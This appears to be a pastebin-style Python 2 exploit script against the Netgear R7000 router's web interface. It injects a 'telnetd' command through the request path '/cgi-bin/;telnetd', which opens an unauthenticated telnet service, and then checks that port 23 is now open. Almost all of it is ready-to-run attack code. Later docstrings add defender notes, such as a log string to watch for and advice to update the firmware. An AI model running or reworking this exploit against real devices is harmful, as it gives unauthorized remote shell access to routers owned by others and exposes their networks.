
Simple Netgear R7000 Command Injection Exploit

The_Defalt Dec 25th, 2016 203 Never
  1. #! /usr/bin/python
  2.  
  3. import socket
  4. import sys
  5. import requests
  6.  
  7. #This is a pretty simple exploit, not many modules needed!
  8.  
  9.  
  # Exactly one command-line argument is accepted: the address of the device.
  # The value is used as given, both as the socket address in the TCP probes
  # and as the host part of the HTTP URL built in exploit().
  if len(sys.argv) == 2:
      host = sys.argv[1]
  else:
      print "usage: ./exploit [TARGET]"
      sys.exit(1)
  15.  
  def checkVuln():
      """Run a reachability pre-check and exit the process if it fails.

      Opens plain TCP connections to ports 80 and 23 on ``host`` and passes
      only when port 80 accepts the connection and port 23 does not.

      Despite the name, nothing here identifies the device model or its
      firmware: any host with HTTP reachable and telnet closed passes. The
      closed port 23 serves as the baseline that verify() later compares
      against.

      Any exception raised while probing, or a port state other than the one
      described above, prints 'fail' and exits with status 1.
      """
      print 'checking host... ',
      sys.stdout.flush()
      try:
          # No timeout is set on either socket, so each probe can block for
          # as long as the OS connect timeout allows.
          http_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          http_status = http_sock.connect_ex((host, 80))
          telnet_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          telnet_status = telnet_sock.connect_ex((host, 23))
          http_sock.close()
          telnet_sock.close()
          # connect_ex() returns 0 when the connection was established.
          if http_status != 0 or telnet_status == 0:
              raise Exception
          print 'done'
      except Exception:
          print 'fail'
          sys.exit(1)
  32.  
  def exploit():
      """Send the single HTTP GET request that carries the injected command.

      The request path is ``/cgi-bin/;telnetd``. Going by the page title, this
      is a command injection in the Netgear R7000 web interface, with the text
      after ``;`` being the injected command. This code supplies no
      credentials, extra headers or request body.

      For defenders: the request is ordinary HTTP whose URI contains
      ``/cgi-bin/;``, which is a concrete string to look for in proxy, IDS or
      router logs. A router that begins accepting connections on TCP 23 is the
      artifact verify() checks for afterwards. Running firmware in which the
      vendor has fixed the injection, and keeping the admin web interface
      unreachable from untrusted networks, removes the exposure.

      NOTE(review): 'done' is printed whether or not requests.get() raises,
      and the response is never inspected, so this output says nothing about
      whether the request was delivered or what the device answered.
      """
      print 'attempting exploit... ',
      sys.stdout.flush()
      url = 'http://' + host + '/cgi-bin/;telnetd'
      try:
          requests.get(url)
          print 'done'
      except Exception:
          print 'done'
  40.  
  def verify():
      """Check whether TCP port 23 on ``host`` now accepts connections.

      checkVuln() only lets the script proceed when port 23 was closed, so an
      open port here is reported as 'success!'. The check is a bare TCP
      connect: no telnet negotiation or banner is read, so it cannot tell
      which service is actually answering on the port.

      A non-zero connect_ex() result, or any exception, prints 'fail' and
      exits with status 1.
      """
      print 'verifying exploitation... ',
      sys.stdout.flush()
      try:
          telnet_probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          status = telnet_probe.connect_ex((host, 23))
          telnet_probe.close()
          if status != 0:
              raise Exception
          print 'success!'
      except Exception:
          print 'fail'
          sys.exit(1)
  54.  
  # The order matters. checkVuln() requires port 23 to be closed beforehand,
  # so verify() finding it open afterwards is read as the effect of the
  # request sent by exploit(). checkVuln() and verify() exit with status 1 on
  # failure, which stops the sequence.
  for stage in (checkVuln, exploit, verify):
      stage()